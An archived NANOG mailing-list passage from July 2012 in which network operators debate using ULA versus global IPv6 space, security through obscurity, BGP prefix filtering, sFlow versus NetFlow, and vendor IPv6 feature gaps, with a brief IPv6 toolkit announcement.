available at: Additionally, I've created a git repository for the toolkit, such that collaboration is improved. The git repo is available at: If you have access to a Mac OS box, please try to compile the tools, and let me know if you find any errors (or let me know if they compiled cleanly). If you can also run the tools according to some of the examples in the manuals (and report any problems), that would be great, too. P.S.: If you've sent patches and your patches have not yet been applied, most likely it just means that I'm catching-up with them (feel free to resend!). Thanks! Best regards,-- Fernando Gont e-mail: fernando at gont.com.ar || fgont at si6networks.com PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iQEcBAEBAgAGBQJQAtn3AAoJEJbuqe/Qdv/xYIgH+wTQXJ3iNEnGnA0cMazS32py 3HfTdcMaEphnfF2a15dq1h/uqF05g3t9KqU744A1XmMtDlChvQ2I77uj2amqaeKi dED6e/NTuVAxTAI0ZTPIEn7BkDgtqvhuaoth+E4SX73lJC9eJR7e3T3BAtbESZaQ Sp67lvtgYmqogDc0IQALGNucyhHmacfUBocVLVgmVPn8BwdFxHI80W+Vc6TnKfjm Yc9ijgUPLTu0hOGD4bpOeQ2V3Dzw9PW17PyJlPr3TzWLzb8g64/zZROtHjXl/V4s 0JNAZVrHNDvA7kfEujzsoLcnQLCfq3+jzecvXcGwgsYMDXRBL8Lv628OAhrVglY= =Z3+1 -----END PGP SIGNATURE----- From rbf+nanog at panix.com Sun Jul 15 10:28:50 2012 From: rbf+nanog at panix.com (Brett Frankenberger) Date: Sun, 15 Jul 2012 10:28:50 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <86a9z1hjzy.fsf@seastrom.com> References: <86a9z1hjzy.fsf@seastrom.com> Message-ID: <20120715152850.GA11988@panix.com> On Sat, Jul 14, 2012 at 09:48:49PM -0400, Robert E. Seastrom wrote: > > Actually, that's one of the most insightful meta-points I've seen on > NANOG in a long time. > > There is a HUGE difference between IPv4 and IPv6 thinking. We've all > been living in an austerity regime for so long that we've completely > forgotten how to leave parsimony behind. Even those of us who worked > at companies that were summarily handed a Class B when we mumbled > something about "internal subnetting" have a really hard time > remembering how to act when we suddenly don't have to answer for every > single host address and can design a network to conserve other things > (like our brain cells). Addresses no longer being scarce is a significant shift, but this thread is about a lot more than that. I didn't get the feeling that the original poster was wanting to use non-global addresses on his internal links because he was concerned about running out. He also wanted to do so for purposes of security. And that's not a paradigm shift between v4 and v6. Obscurity / non-global address "magic" was pretend security in v4 and it's pretend security in v6. People who used RFC1918 space where they didn't need global uniqueness in v4 often did so initially because of scarcity (and were often making a completely reasonable decision in doing so), but they then falsly imputed a security benefit to that. If we can leverage the v6 migraton to get out of the thinking that some addresses are magically more secure than others, then that's probably a win, but it's not a fundamental difference between v4 and v6. It's not that correct IPv4 thinking is "1918 is more secure" but the security model of v6 is different. 1918 was never more secure. -- Brett From valdis.kletnieks at vt.edu Sun Jul 15 10:44:50 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Sun, 15 Jul 2012 11:44:50 -0400 Subject: using "reserved" IPv6 space In-Reply-To: Your message of "Sat, 14 Jul 2012 17:37:37 -0500." References: <52169.1342301812@turing-police.cc.vt.edu> Message-ID: <97527.1342367090@turing-police.cc.vt.edu> On Sat, 14 Jul 2012 17:37:37 -0500, Jimmy Hess said: > The good news is one 'ifconfig' just tells them what network > address you're in. > Unless the attacker can gain access to your host's NDP table or ARP > table, they can't see what IPs are in use. All it takes is one USB stick left out in the parking lot for an employee.. By the time they get enough access to do an 'ifconfig', rest assured that they can see the NDP/ARP tables and all the traffic on that network segment as well. (OK.. maybe for some reason they can't - but if you're betting your security model on somebody getting a beachhead on one of your machines and *not* having full access to the network segment, I'll be more than happy to take the other side of the bet). -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From Grzegorz at Janoszka.pl Sun Jul 15 10:58:20 2012 From: Grzegorz at Janoszka.pl (Grzegorz Janoszka) Date: Sun, 15 Jul 2012 17:58:20 +0200 Subject: using "reserved" IPv6 space In-Reply-To: <5002C5F5.4040505@emanon.com> References: <52169.1342301812@turing-police.cc.vt.edu> <03b201cd6212$520ab820$f6202860$@tndh.net> <50028FA6.3040803@Janoszka.pl> <5002C5F5.4040505@emanon.com> Message-ID: <5002E89C.1040801@Janoszka.pl> On 2012-07-15 15:30, Scott Morris wrote: >> There was also in the past fec0::/10. For BGP updates you should be safe >> to filter out FC00::/6. > Unless I've missed something, RFC4193 lays out FC00::/7, not the /6. So > while FE00::/7 may yet be unallocated, I don't think I'd set filters in > that fashion. > Reasonably, wouldn't it be more likely to permit BGP advertisements > within the 2000::/3 range as that's the "active" space currently? FF00::/8 are multicast, FE80::/10 are reserved for link-local. In the past you had FEC0::/10 as a kind of private addresses. Allowing 2000::/3 is fine as well. Btw - what are the estimates - how long are we going to be within 2000::/3? -- Grzegorz Janoszka From mike at mikejones.in Sun Jul 15 12:22:04 2012 From: mike at mikejones.in (Mike Jones) Date: Sun, 15 Jul 2012 18:22:04 +0100 Subject: using "reserved" IPv6 space In-Reply-To: <5002E89C.1040801@Janoszka.pl> References: <52169.1342301812@turing-police.cc.vt.edu> <03b201cd6212$520ab820$f6202860$@tndh.net> <50028FA6.3040803@Janoszka.pl> <5002C5F5.4040505@emanon.com> <5002E89C.1040801@Janoszka.pl> Message-ID: On 15 July 2012 16:58, Grzegorz Janoszka wrote: > Allowing 2000::/3 is fine as well. Btw - what are the estimates - how > long are we going to be within 2000::/3? > I expect it to be long enough that we can enjoy lots of discussions about how to deal with broken route filtering and broken software that assumes only 2000::/3 is valid, and we can talk about how we should have seen this coming and done something differently to prevent it. - Mike From owen at delong.com Sun Jul 15 14:22:14 2012 From: owen at delong.com (Owen DeLong) Date: Sun, 15 Jul 2012 12:22:14 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <5002E89C.1040801@Janoszka.pl> References: <52169.1342301812@turing-police.cc.vt.edu> <03b201cd6212$520ab820$f6202860$@tndh.net> <50028FA6.3040803@Janoszka.pl> <5002C5F5.4040505@emanon.com> <5002E89C.1040801@Janoszka.pl> Message-ID: <1FFE1C96-A0E4-4B94-A9DF-D586A7321D80@delong.com> On Jul 15, 2012, at 8:58 AM, Grzegorz Janoszka wrote: > On 2012-07-15 15:30, Scott Morris wrote: >>> There was also in the past fec0::/10. For BGP updates you should be safe >>> to filter out FC00::/6. >> Unless I've missed something, RFC4193 lays out FC00::/7, not the /6. So >> while FE00::/7 may yet be unallocated, I don't think I'd set filters in >> that fashion. >> Reasonably, wouldn't it be more likely to permit BGP advertisements >> within the 2000::/3 range as that's the "active" space currently? > > FF00::/8 are multicast, FE80::/10 are reserved for link-local. In the > past you had FEC0::/10 as a kind of private addresses. > > Allowing 2000::/3 is fine as well. Btw - what are the estimates - how > long are we going to be within 2000::/3? Quite probably longer than anyone now reading this message will be alive. So far, I believe IANA has allocated 6 or 7 of the /12s from 2000::/3 to RIRs. That leaves at least 500+ /12s still to go. Even with ARIN's extremely liberal policies, I expect ARIN will be able to number all of their service region in its current state from 3 or 4 /12s. Assuming this somewhat follows world population, APNIC should require <=12 /12s, RIPE should need <= 6 /12s, AfriNIC should require <= 6 /12s, and LACNIC should require <= 4 /12s. Adding that up, I get 4+12+6+6+4 = 32 /12s if the entire world were to adopt ARIN's extremely liberal (which I think is a good thing) IPv6 allocation policies. Assuming that the world population (and thus address need) continues on a 1.5% per year growth trajectory, that would double the population every 46+ years. With a lifespan of ~100 years and assuming that everyone reading this is now over the age of 10, that's 4*32 = 128 /12s in the next 92 years, leaving us with 384 /12s still sitting on the shelf after the last of us now reading this message is dead. So, even if I'm wrong and it's 3 times what I anticipate, we still won't use up 2000::/3 in any of our lifetimes. Owen From nick at foobar.org Sun Jul 15 15:52:50 2012 From: nick at foobar.org (Nick Hilliard) Date: Sun, 15 Jul 2012 21:52:50 +0100 Subject: Real world sflow vs netflow? In-Reply-To: <50012E21.4060802@bromirski.net> References: <50012E21.4060802@bromirski.net> Message-ID: <50032DA2.9020108@foobar.org> On 14/07/2012 09:30, ?ukasz Bromirski wrote: > And that's the biggest problem with sFlow. Packets are sampled, not > flows. You may miss the big or important flow, you don't have > visibility into every conversation going through the device. Unless you enable sampling, which is pretty much necessary for non-trivial traffic volumes. > NetFlow supports IPv6. As well as L2 traffic (v9), MPLS, multicast and > so on. It does, depending on hardware variety, but you need specific platform support for each packet variety (v4 / v6 / mpls / etc), and platform support for this can be very dodgy. You don't need this with sflow - it just punts 1 in N raw packets out to your collector, and the statistical assumptions which were made by the networking device are well documented. I've never seen documentation on the sampling technique used for each netflow implementation. > The measurements provided by sFlow are only approximation of the real > traffic and while it may be acceptable on LAN links where details don't > matter as much, it's hardly good enough to present a real view on the > WAN links. > > sFlow was built to work on switches and provide "some" accuracy, it's > not good enough (unless you do sampling on a 1:5-1:10 basis) to > do billing or some detailed analysis of traffic: Depends on how detailed your requirements are. For billing, most people don't classify by packet analysis, but rather by byte count which can be handled by snmp port counters. If you need to do something fancier, non-sampled netflow is indeed good enough for billing. > http://www.inmon.com/pdf/sFlowBilling.pdf > > You can use it to *estimate* the traffic, detect DDoS, sure. But the > data & scaling used by sFlow (and additionally tricks used by ASIC > vendors implementing it in the hardware) can't change the fundamental > difference - sFlow is really sPacket, as it doesn't deal with flows. agreed, the name is wrong. > NetFlow, jFlow, IPFIX deal with flows. You can discuss sampling > accuracy and things like that, but working with flows is more accurate. Depends on your use case. For large traffic values, you run into the law of large numbers and you can get accurate visibility into what's happening on your network. Certainly, netflow _can_ offer amazingly precise visibility into your network. But the trade-off is that you need specialised hardware to do this on your line cards or your forwarding engine. This drives up both the capex (extra hardware) and the opex (tcam is power hungry) of your network. sflow is much cheaper to implement as you're not maintaining any state on your chassis. You're just picking out a packet every so often. The current generation of high end service provider hardware (juniper mx-3d, cisco sup2t / n7k / asr9k) is pretty much the first generation of hardware which doesn't have crippling netflow limitations, such as poor support for v6 / mpls, too small cache sizes, etc. This fact alone should provide a good indication of how difficult it is to implement it well on fast boxes. sflow is simpler, cheaper and in many cases is simply a better choice if you don't need drill-down into every single flow going through your networking. Nick From swm at emanon.com Sun Jul 15 17:21:09 2012 From: swm at emanon.com (Scott Morris) Date: Sun, 15 Jul 2012 18:21:09 -0400 Subject: using "reserved" IPv6 space In-Reply-To: <5002E89C.1040801@Janoszka.pl> References: <52169.1342301812@turing-police.cc.vt.edu> <03b201cd6212$520ab820$f6202860$@tndh.net> <50028FA6.3040803@Janoszka.pl> <5002C5F5.4040505@emanon.com> <5002E89C.1040801@Janoszka.pl> Message-ID: <50034255.9090700@emanon.com> On 7/15/12 11:58 AM, Grzegorz Janoszka wrote: > On 2012-07-15 15:30, Scott Morris wrote: >>> There was also in the past fec0::/10. For BGP updates you should be safe >>> to filter out FC00::/6. >> Unless I've missed something, RFC4193 lays out FC00::/7, not the /6. So >> while FE00::/7 may yet be unallocated, I don't think I'd set filters in >> that fashion. >> Reasonably, wouldn't it be more likely to permit BGP advertisements >> within the 2000::/3 range as that's the "active" space currently? > FF00::/8 are multicast, FE80::/10 are reserved for link-local. In the > past you had FEC0::/10 as a kind of private addresses. > > Allowing 2000::/3 is fine as well. Btw - what are the estimates - how > long are we going to be within 2000::/3? > hehehhe.. Long enough for us to forget what prefix lists we put on to begin with and need to look them back up! From kmedcalf at dessus.com Sun Jul 15 18:55:44 2012 From: kmedcalf at dessus.com (Keith Medcalf) Date: Sun, 15 Jul 2012 17:55:44 -0600 Subject: =?utf-8?B?UmU6IHVzaW5nICJyZXNlcnZlZCIgSVB2NiBzcGFjZQ==?= Message-ID: Ifconfig does not work on Windows. Are you saying that there are other operating systems brain-dead enough to just run any old arbitrary code from untrusted media? Sent from my Android phone using TouchDown (www.nitrodesk.com) -----Original Message----- From: [valdis.kletnieks at vt.edu] Received: Sunday, 15 Jul 2012, 9:45 To: Jimmy Hess [mysidia at gmail.com] CC: [nanog at nanog.org]; Brandon Ross [bross at pobox.com] Subject: Re: using "reserved" IPv6 space On Sat, 14 Jul 2012 17:37:37 -0500, Jimmy Hess said: > The good news is one 'ifconfig' just tells them what network > address you're in. > Unless the attacker can gain access to your host's NDP table or ARP > table, they can't see what IPs are in use. All it takes is one USB stick left out in the parking lot for an employee.. By the time they get enough access to do an 'ifconfig', rest assured that they can see the NDP/ARP tables and all the traffic on that network segment as well. (OK.. maybe for some reason they can't - but if you're betting your security model on somebody getting a beachhead on one of your machines and *not* having full access to the network segment, I'll be more than happy to take the other side of the bet). Sent from my Android phone using TouchDown (www.nitrodesk.com) From randy at psg.com Sun Jul 15 18:58:39 2012 From: randy at psg.com (Randy Bush) Date: Mon, 16 Jul 2012 08:58:39 +0900 Subject: using "reserved" IPv6 space In-Reply-To: References: Message-ID: > Ifconfig does not work on Windows. i am about as far from a windows expert as you can get. but i believe it is ipconfig > Are you saying that there are other operating systems brain-dead > enough to just run any old arbitrary code from untrusted media? > > Sent from my Android phone ROFL! randy From mysidia at gmail.com Sun Jul 15 19:24:18 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Sun, 15 Jul 2012 19:24:18 -0500 Subject: using "reserved" IPv6 space In-Reply-To: References: Message-ID: On 7/15/12, Keith Medcalf wrote: > Ifconfig does not work on Windows. Who needs ifconfig with windows? any user who can open a cmd session can run IPCONFIG /ALL The same can be queried remotely using WMI Select * From Win32_NetworkAdapterConfiguration WHERE IPEnabled=true > Are you saying that there are other operating systems brain-dead enough to > just run any old arbitrary code from untrusted media? That depends... what do you mean by untrusted media? Many OSes, even certain versions of Linux that support Firewire can be coerced into running arbitrary code, by plugging in a malicious firewire device, unless there is an IOMMU or other measures protecting against malicious memory access when a DMA is requested Various hardware devices, and drivers have vulnerabilities, even without 'autoplay'. And some *ix distros do support 'autoplay-like' functionality. > Sent from my Android phone using TouchDown (www.nitrodesk.com) -- -JH From valdis.kletnieks at vt.edu Sun Jul 15 21:51:23 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Sun, 15 Jul 2012 22:51:23 -0400 Subject: =?utf-8?B?UmU6IHVzaW5nICJyZXNlcnZlZCIgSVB2NiBzcGFjZQ==?= In-Reply-To: Your message of "Sun, 15 Jul 2012 17:55:44 -0600." References: Message-ID: <123328.1342407083@turing-police.cc.vt.edu> On Sun, 15 Jul 2012 17:55:44 -0600, "Keith Medcalf" said: > Are you saying that there are other operating systems brain-dead enough to > just run any old arbitrary code from untrusted media? As Vint Cerf pointed out, 140 million pwned boxes. How you think they got that way, and what are the chances that *none* of them are inside your net? -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From ler762 at gmail.com Sun Jul 15 22:35:17 2012 From: ler762 at gmail.com (Lee) Date: Sun, 15 Jul 2012 23:35:17 -0400 Subject: using "reserved" IPv6 space In-Reply-To: <86a9z1hjzy.fsf@seastrom.com> References: <86a9z1hjzy.fsf@seastrom.com> Message-ID: On 7/14/12, Robert E. Seastrom wrote: > > Actually, that's one of the most insightful meta-points I've seen on > NANOG in a long time. > > There is a HUGE difference between IPv4 and IPv6 thinking. We've all > been living in an austerity regime for so long that we've completely > forgotten how to leave parsimony behind. Even those of us who worked > at companies that were summarily handed a Class B when we mumbled > something about "internal subnetting" have a really hard time > remembering how to act when we suddenly don't have to answer for every > single host address and can design a network to conserve other things > (like our brain cells). Suggestions? I feel like I should be able to do something really nice with an absurdly large address space. But lack of imagination or whatever.. I haven't come up with anything that really appeals to me. Thanks, Lee > -Hammer- writes: > >> >> >> Thank you all. It's not the protocol that hurts. It's rethinking the >> culture/philosophy around it. >> >> -Hammer- >> >> On 7/14/12 3:20 PM, "Owen DeLong" wrote: >> >>>They're a bad thing in IPv6. >>> >>>The only place for security through obscurity IMHO is a small round >>>container that sits next to my desk. >>> >>>Besides, if you don't advertise it, a GUA prefix is just as obscure as a >>>ULA prefix and provides a larger search space in which one has to hunt >>>for it... Think /3 instead of /8. >>> >>>Owen >>> >>>On Jul 14, 2012, at 1:14 PM, -Hammer- wrote: >>> >>>> Guys, >>>> The whole purpose of this is that they do NOT need to be global. >>>> Security thru obscurity. It actually has a place in some worlds. Does >>>>that >>>> make sense? Or are such V4-centric approaches a bad thing in v6? >>>> >>>> On 7/13/12 8:41 PM, "Brandon Ross" wrote: >>>> >>>>> On Fri, 13 Jul 2012, Owen DeLong wrote: >>>>> >>>>>> On Jul 13, 2012, at 4:24 PM, Randy Bush wrote: >>>>>> >>>>>>> keep life simple. use global ipv6 space. >>>>>>> >>>>>>> randy >>>>>> >>>>>> Though it is rare, this is one time when I absolutely agree with >>>>>>Randy. >>>>> >>>>> It's even more rare for me to agree with Randy AND Owen at the same >>>>>time. >>>>> >>>>> -- >>>>> Brandon Ross Yahoo & AIM: >>>>> BrandonNRoss >>>>> +1-404-635-6667 ICQ: >>>>> 2269442 >>>>> Schedule a meeting: https://tungle.me/bross Skype: >>>>> brandonross >>>>> >>>> >>>> >>> > > From johnl at iecc.com Sun Jul 15 22:58:12 2012 From: johnl at iecc.com (John Levine) Date: 16 Jul 2012 03:58:12 -0000 Subject: using "reserved" IPv6 space In-Reply-To: Message-ID: <20120716035812.87659.qmail@joyce.lan> >I feel like I should be able to do something really nice with an >absurdly large address space. But lack of imagination or whatever.. I >haven't come up with anything that really appeals to me. Use a fresh IP for every HTTP request, email message, and IM. Just think of how well you can do error management. R's, John From jabley at hopcount.ca Mon Jul 16 09:03:54 2012 From: jabley at hopcount.ca (Joe Abley) Date: Mon, 16 Jul 2012 10:03:54 -0400 Subject: Netsol AAAA glue In-Reply-To: <20120714060659.GA46015@geeks.org> References: <20120714060659.GA46015@geeks.org> Message-ID: <9B85A2EA-D892-42B0-8409-78998161F390@hopcount.ca> On 2012-07-14, at 02:06, Doug McIntyre wrote: > OpenSRS does (now) have online IPv6 glue-record editing. > > They can insert DS records by hand if you email into their support > department (assuming you are the reseller and you have access to their > support department, otherwise you have to work through your reseller). For COM and NET only. Not ORG, not any ccTLDs, as far as I know. Joe From bhmccie at gmail.com Mon Jul 16 10:11:48 2012 From: bhmccie at gmail.com (-Hammer-) Date: Mon, 16 Jul 2012 10:11:48 -0500 Subject: using "reserved" IPv6 space In-Reply-To: References: <86a9z1hjzy.fsf@seastrom.com> Message-ID: <50042F34.5080007@gmail.com> There are multiple issues here. I understand most folks on these threads are beyond me but I'm pretty sure I'm not the only person in this position. 1) (This one is currently a personal issue) I am still building up a true IPv6 skillset. Yes, I understand it for the most part but now is the time to apply it. 2) All the reading you do doesn't prepare you for application and the vendors aren't necessarily helping. Feature parity across platforms and vendors beyond just "interface x/x/x" and "ipv6 address fe80:blah:blah::babe:1" seems to seriously be lacking. When I try to take what I understand and apply it beyond the basics I often see hurdles. Example? HSRP IPv6 global addressing on Cisco ASR platform. If it's working for you hit me offline. Example2? Any vendor product beyond a router or switch. CheckPoint FW? F5 LB? Netscaler LB or AF? The WAN guys may be rolling deep in IPv6 but not everyone else. I just got an EA this morning from CheckPoint for NAT66. This should have been ready for prime time years ago. I guess the vendors weren't getting the push from the customers so there was no need to make an effort.... 3) When I'm not preoccupied attempting to digest the fundamentals I am well aware of the retooling of the brain that is required for this in a network design. Last year I reached out to Team Cymru and attempted to build an IPv6 router template to match their IPv4 template. It was a completely different animal. Ironically most of the STIGs and NSA reference garbage I used was ten years old but still applied. After going thru all those docs my brain hurt trying to orient my ACLs properly and go thru all the different attributes you want to block where and when. Then I spent some time trying to work our design schemas for our ARIN space with the WAN design team. What I'm trying to say is that Roberts comments are spot on. It is a very different way of thinking on a small scale and a large scale and you can't take your IPv4 logic and apply it. I've tried and it's just slowing me down. -Hammer- "I was a normal American nerd" -Jack Herer On 7/15/2012 10:35 PM, Lee wrote: > On 7/14/12, Robert E. Seastrom wrote: >> Actually, that's one of the most insightful meta-points I've seen on >> NANOG in a long time. >> >> There is a HUGE difference between IPv4 and IPv6 thinking. We've all >> been living in an austerity regime for so long that we've completely >> forgotten how to leave parsimony behind. Even those of us who worked >> at companies that were summarily handed a Class B when we mumbled >> something about "internal subnetting" have a really hard time >> remembering how to act when we suddenly don't have to answer for every >> single host address and can design a network to conserve other things >> (like our brain cells). > Suggestions? > > I feel like I should be able to do something really nice with an > absurdly large address space. But lack of imagination or whatever.. I > haven't come up with anything that really appeals to me. > > Thanks, > Lee > > >> -Hammer- writes: >> >>> >>> >>> Thank you all. It's not the protocol that hurts. It's rethinking the >>> culture/philosophy around it. >>> >>> -Hammer- >>> >>> On 7/14/12 3:20 PM, "Owen DeLong" wrote: >>> >>>> They're a bad thing in IPv6. >>>> >>>> The only place for security through obscurity IMHO is a small round >>>> container that sits next to my desk. >>>> >>>> Besides, if you don't advertise it, a GUA prefix is just as obscure as a >>>> ULA prefix and provides a larger search space in which one has to hunt >>>> for it... Think /3 instead of /8. >>>> >>>> Owen >>>> >>>> On Jul 14, 2012, at 1:14 PM, -Hammer- wrote: >>>> >>>>> Guys, >>>>> The whole purpose of this is that they do NOT need to be global. >>>>> Security thru obscurity. It actually has a place in some worlds. Does >>>>> that >>>>> make sense? Or are such V4-centric approaches a bad thing in v6? >>>>> >>>>> On 7/13/12 8:41 PM, "Brandon Ross" wrote: >>>>> >>>>>> On Fri, 13 Jul 2012, Owen DeLong wrote: >>>>>> >>>>>>> On Jul 13, 2012, at 4:24 PM, Randy Bush wrote: >>>>>>> >>>>>>>> keep life simple. use global ipv6 space. >>>>>>>> >>>>>>>> randy >>>>>>> Though it is rare, this is one time when I absolutely agree with >>>>>>> Randy. >>>>>> It's even more rare for me to agree with Randy AND Owen at the same >>>>>> time. >>>>>> >>>>>> -- >>>>>> Brandon Ross Yahoo & AIM: >>>>>> BrandonNRoss >>>>>> +1-404-635-6667 ICQ: >>>>>> 2269442 >>>>>> Schedule a meeting: https://tungle.me/bross Skype: >>>>>> brandonross >>>>>> >>>>> >> From rcarpen at network1.net Mon Jul 16 10:21:19 2012 From: rcarpen at network1.net (Randy Carpenter) Date: Mon, 16 Jul 2012 11:21:19 -0400 (EDT) Subject: IPv6 Toolkit v1.2: Latest snapshot, and git repo In-Reply-To: <5002DA03.6060007@gont.com.ar> Message-ID: <1123039916.37623.1342452079021.JavaMail.root@network1.net> Appears to compile file on Mac OS X 10.7. The resulting programs run, but I have not tried any real testing with actual data. thanks, -Randy ----- Original Message ----- > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Folks, > > I've posted a snapshot (tarball) of my working copy of the IPv6 > toolkit. The tarball is available at: > > > Additionally, I've created a git repository for the toolkit, such > that > collaboration is improved. The git repo is available at: > > > If you have access to a Mac OS box, please try to compile the tools, > and let me know if you find any errors (or let me know if they > compiled cleanly). If you can also run the tools according to some of > the examples in the manuals (and report any problems), that would be > great, too. > > P.S.: If you've sent patches and your patches have not yet been > applied, most likely it just means that I'm catching-up with them > (feel free to resend!). > > Thanks! > > Best regards,-- > Fernando Gont > e-mail: fernando at gont.com.ar || fgont at si6networks.com > PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1 > > > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.11 (GNU/Linux) > > iQEcBAEBAgAGBQJQAtn3AAoJEJbuqe/Qdv/xYIgH+wTQXJ3iNEnGnA0cMazS32py > 3HfTdcMaEphnfF2a15dq1h/uqF05g3t9KqU744A1XmMtDlChvQ2I77uj2amqaeKi > dED6e/NTuVAxTAI0ZTPIEn7BkDgtqvhuaoth+E4SX73lJC9eJR7e3T3BAtbESZaQ > Sp67lvtgYmqogDc0IQALGNucyhHmacfUBocVLVgmVPn8BwdFxHI80W+Vc6TnKfjm > Yc9ijgUPLTu0hOGD4bpOeQ2V3Dzw9PW17PyJlPr3TzWLzb8g64/zZROtHjXl/V4s > 0JNAZVrHNDvA7kfEujzsoLcnQLCfq3+jzecvXcGwgsYMDXRBL8Lv628OAhrVglY= > =Z3+1 > -----END PGP SIGNATURE----- > > > From owen at delong.com Mon Jul 16 10:43:00 2012 From: owen at delong.com (Owen DeLong) Date: Mon, 16 Jul 2012 08:43:00 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <50042F34.5080007@gmail.com> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> Message-ID: <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com> On Jul 16, 2012, at 8:11 AM, -Hammer- wrote: > There are multiple issues here. I understand most folks on these threads are beyond me but I'm pretty sure I'm not the only person in this position. > > 1) (This one is currently a personal issue) I am still building up a true IPv6 skillset. Yes, I understand it for the most part but now is the time to apply it. Frankly, IMHO, the best way to build up a truly useful IPv6 skill set is to start applying what you don't know and see what happens. For the most part, you will find that it is truly "96 more bits, no magic". > 2) All the reading you do doesn't prepare you for application and the vendors aren't necessarily helping. Feature parity across platforms and vendors beyond just "interface x/x/x" and "ipv6 address fe80:blah:blah::babe:1" seems to seriously be lacking. When I try to take what I understand and apply it beyond the basics I often see hurdles. Example? HSRP IPv6 global addressing on Cisco ASR platform. If it's working for you hit me offline. Example2? Any vendor product beyond a router or switch. CheckPoint FW? F5 LB? Netscaler LB or AF? The WAN guys may be rolling deep in IPv6 but not everyone else. I just got an EA this morning from CheckPoint for NAT66. This should have been ready for prime time years ago. I guess the vendors weren't getting the push from the customers so there was no need to make an effort.... You probably meant 2001:db8:b1aa:b1aa::babe:1 ;-) (blah isn't hex and fe80::/10 is link local. 2001:db8::/16 is the example prefix) For the most part, HSRP really isn't even necessary or useful in IPv6 since ND should take care of what HSRP did for IPv4. I believe F5 has rolled out IPv6 in a subset of their products and that you need pretty recent versions to get IPv6 functionality from them. The ARIN Wiki (http://www.getipv6.info) may be a good source of information on various vendor statuses. Contribute what you know/find out there as well, please. Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is being able to eliminate NAT. NAT was a necessary evil for IPv4 address conservation. It has no good use in IPv6. > 3) When I'm not preoccupied attempting to digest the fundamentals I am well aware of the retooling of the brain that is required for this in a network design. Last year I reached out to Team Cymru and attempted to build an IPv6 router template to match their IPv4 template. It was a completely different animal. Ironically most of the STIGs and NSA reference garbage I used was ten years old but still applied. After going thru all those docs my brain hurt trying to orient my ACLs properly and go thru all the different attributes you want to block where and when. Then I spent some time trying to work our design schemas for our ARIN space with the WAN design team. What I'm trying to say is that Roberts comments are spot on. It is a very different way of thinking on a small scale and a large scale and you can't take your IPv4 logic and apply it. I've tried and it's just slowing me down. Yes and no. If you have been doing IPv4 long enough to remember pre-NAT IPv4, then, you just need to remember some of the old ways of IPv4. If you have no recollection of IPv4 without NAT, then, you are correct, it is a huge paradigm shift to go back to the way the internet is supposed to have been before we ran out of addresses. Owen > > > -Hammer- > > "I was a normal American nerd" > -Jack Herer > > On 7/15/2012 10:35 PM, Lee wrote: >> On 7/14/12, Robert E. Seastrom wrote: >>> Actually, that's one of the most insightful meta-points I've seen on >>> NANOG in a long time. >>> >>> There is a HUGE difference between IPv4 and IPv6 thinking. We've all >>> been living in an austerity regime for so long that we've completely >>> forgotten how to leave parsimony behind. Even those of us who worked >>> at companies that were summarily handed a Class B when we mumbled >>> something about "internal subnetting" have a really hard time >>> remembering how to act when we suddenly don't have to answer for every >>> single host address and can design a network to conserve other things >>> (like our brain cells). >> Suggestions? >> >> I feel like I should be able to do something really nice with an >> absurdly large address space. But lack of imagination or whatever.. I >> haven't come up with anything that really appeals to me. >> >> Thanks, >> Lee >> >> >>> -Hammer- writes: >>> >>>> >>>> >>>> Thank you all. It's not the protocol that hurts. It's rethinking the >>>> culture/philosophy around it. >>>> >>>> -Hammer- >>>> >>>> On 7/14/12 3:20 PM, "Owen DeLong" wrote: >>>> >>>>> They're a bad thing in IPv6. >>>>> >>>>> The only place for security through obscurity IMHO is a small round >>>>> container that sits next to my desk. >>>>> >>>>> Besides, if you don't advertise it, a GUA prefix is just as obscure as a >>>>> ULA prefix and provides a larger search space in which one has to hunt >>>>> for it... Think /3 instead of /8. >>>>> >>>>> Owen >>>>> >>>>> On Jul 14, 2012, at 1:14 PM, -Hammer- wrote: >>>>> >>>>>> Guys, >>>>>> The whole purpose of this is that they do NOT need to be global. >>>>>> Security thru obscurity. It actually has a place in some worlds. Does >>>>>> that >>>>>> make sense? Or are such V4-centric approaches a bad thing in v6? >>>>>> >>>>>> On 7/13/12 8:41 PM, "Brandon Ross" wrote: >>>>>> >>>>>>> On Fri, 13 Jul 2012, Owen DeLong wrote: >>>>>>> >>>>>>>> On Jul 13, 2012, at 4:24 PM, Randy Bush wrote: >>>>>>>> >>>>>>>>> keep life simple. use global ipv6 space. >>>>>>>>> >>>>>>>>> randy >>>>>>>> Though it is rare, this is one time when I absolutely agree with >>>>>>>> Randy. >>>>>>> It's even more rare for me to agree with Randy AND Owen at the same >>>>>>> time. >>>>>>> >>>>>>> -- >>>>>>> Brandon Ross Yahoo & AIM: >>>>>>> BrandonNRoss >>>>>>> +1-404-635-6667 ICQ: >>>>>>> 2269442 >>>>>>> Schedule a meeting: https://tungle.me/bross Skype: >>>>>>> brandonross >>>>>>> >>>>>> >>> > > From bhmccie at gmail.com Mon Jul 16 11:09:28 2012 From: bhmccie at gmail.com (-Hammer-) Date: Mon, 16 Jul 2012 11:09:28 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com> Message-ID: <50043CB8.20302@gmail.com> Inline - -Hammer- "I was a normal American nerd" -Jack Herer 1) (This one is currently a personal issue) I am still building up a true IPv6 skillset. Yes, I understand it for the most part but now is the time to apply it. Frankly, IMHO, the best way to build up a truly useful IPv6 skill set is to start applying what you 